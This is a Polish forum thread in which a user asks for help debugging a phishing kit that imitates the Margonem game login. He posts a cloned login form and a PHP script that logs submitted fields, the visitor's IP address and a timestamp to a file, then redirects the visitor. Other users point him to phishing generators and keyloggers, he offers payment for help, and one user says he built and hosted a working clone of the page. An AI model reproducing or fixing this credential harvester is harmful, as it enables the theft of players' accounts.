Problem z phishingiem

[nokia123]

logon.php

<script type="text/javascript">
$(document).ready(function () {
	$('#upass').keypress(function(e){
		if(e.which==13) login();
	});
});
</script>
    
<div class=menuitem style='background:url(img/tab_log.png)'></div>
<div id=logpanel>
<div id=login><br><center>
<div class=inp><input type=text id=ulogin></div>
<div class=inp><input type=password id=upass maxLength=20></div></center>
<button id=loginbutton onclick='login();' rollover=30> </button><br />
<a style="display: inline; margin: 0; padding: 0; width: 45px; height: 16px;" href="?task=openidlogin&p=google"><img tip="Zaloguj się używając konta Google" src="/img/social_login_google_m.png" border="0"></a>
<a style="display: inline; margin: 0; padding: 0; width: 45px; height: 16px;" href="?task=openidlogin&p=fb"><img tip="Zaloguj się używając konta Facebook" src="/img/social_login_facebook_m.png" border="0"></a>
<b><a href='?task=register'>· szybka rejestracja ·</a></b>
<b><a href='?task=passrecover'>· odzyskaj hasło ·</a></b>
</div>
<img src="/img/log_back1.png" class=logfoot>
</div>
<div class=menuitem style='background:url(img/tab_tools.png)'></div>
<a href="http://www.margonem.pl/?task=support">· Panel kontaktowy</a>

i dopisuje
<form action="pobierz.php" method="get" name="ulogin" >
pobierz.php

<?php
$datum = date('d-m-Y / H:i:s');
$ip = $_SERVER['REMOTE_ADDR'];
header("Location: http://prisonwars.pl");
$handle = fopen("twojastara.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "IP: $ip | Data: $datum (Data=0 GTM)\r\n");
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

i printuje mi tylko ip,date i godzine, a haseł już nie.Co moze byc nietak

 

[Shady69]

a gdzie reszta kodu?

 

[nokia123]

logon.php odwołuje sie do index.html

 

[Shady69]

w kodzie nie masz nawet <form> jak to ma dzialać?

 

[nokia123]

dodałem <form> i nie działa, dodałem </form> też nie działa

 

[kielb0l]

uzyj Phish create V2 znajdziesz na moim chomikuj chomikuj.pl/kielboll

 

[nokia123]

https://www.virustotal.com/pl/file/...e4773d50632b74b78cfbc8d4558ddee9b8f/analysis/ głupich szukasz lelaku?

 

[kielb0l]

to jest narzedzie hakerskie to raz a dwa zobacz ze ja to zachomikowalem wie

 

[nokia123]

narzędzie hakerskie haha, jeśli tak myślisz to chyba jesteś script kiddies

 

[Do4Got]

narzędzie hakerskie haha, jeśli tak myślisz to chyba jesteś script kiddies

Oboje jesteście noobami.
Ty nie umiesz napisać prostego phishingu a on wrzuca na chomika swoje marne keyloggery.
Poza tym script kiddies to liczba mnoga, lol.


Zresztą to że plik jest wykrywalny nie znaczy że jest wirusem.
False positive.
Wiesz co to jest Sandbox? [...]

 

[D.F.]

Jeżeli sygnatura ma w nazwie "Constructor" to znaczy, że jest to generator/konfigurator, może mieć backdoora, ale raczej nie powinien. Polecam uruchomić pod Sandboxie.

 

[nokia123]

pomoże mi ktoś? może jakiś smsek się znajdzie lub doładowanie

 

[panczo12d]

Zrobiłem przed chwilą w 10 minut phishing* strony tej co Ty chciałeś: http://panczo.xaa.pl/margonem/ z przekierowywaniem po zalogowaniu na oryginalną stronę.
Ja zrobiłem ją z ciekawości, tylko pytanie po co jest ona tobie potrzebna, chcesz kraść konta?

* - jest to tylko strona pokazowa, która nie zapisuje żadnych danych, po wysłaniu formularza następuje tylko przekierowanie. Kod odpowiedzialny za zapis danych został osadzony w /* */ screen: http://img515.imageshack.us/img515/216/margonemi.png (efekt rozmazania zastosowany z oczywistych powodów).